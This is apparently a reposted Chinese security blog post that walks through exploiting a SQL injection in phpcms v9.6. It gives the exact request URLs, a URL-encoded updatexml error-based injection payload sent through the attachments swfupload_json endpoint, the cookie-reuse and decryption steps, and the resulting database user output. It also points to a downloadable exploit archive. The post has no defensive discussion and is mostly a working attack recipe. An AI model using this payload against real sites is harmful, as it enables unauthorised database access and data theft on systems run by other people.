phpcms SQL 注入

admin
admin
admin
103416
文章
87
评论
2023年12月15日00:52:55评论17 views字数 464阅读1分32秒阅读模式

phpcms v9.6 SQL 注入

/index.php?m=wap&c=index&a=init&siteid=1

获取 set-cookie 的值

http://cn-sec.com/wp-content/uploads/2023/12/20231214161637-89.jpg

/index.php?m=attachment&c=attachments&a=swfupload_json&aid=1&src=%26id=%*27%20and%20updatexml%281%2Cconcat%281%2C%28user%28%29%29%29%2C1%29%23%26m%3D1%26f%3Dhaha%26modelid%3D2%26catid%3D7%26

post 传入 userid_flash 内容是刚刚获取到的 cookie

http://cn-sec.com/wp-content/uploads/2023/12/20231214161637-31.jpg

如果不成功的话 在 header 里面加上

Content-Type: application/x-www-form-urlencoded

复制 set-cookie 里的 json

/index.php?m=content&c=down&a_k=json

解密

http://cn-sec.com/wp-content/uploads/2023/12/20231214161637-25.jpg

root@localhost

v9sql exp

http://cn-sec.com/wp-content/uploads/2023/12/20231214161637-45.jpg

v9sql.zip

- By:X1r0z[exp10it.cn]

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年12月15日00:52:55
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   phpcms SQL 注入http://cn-sec.com/archives/2301346.html

发表评论

匿名网友 填写信息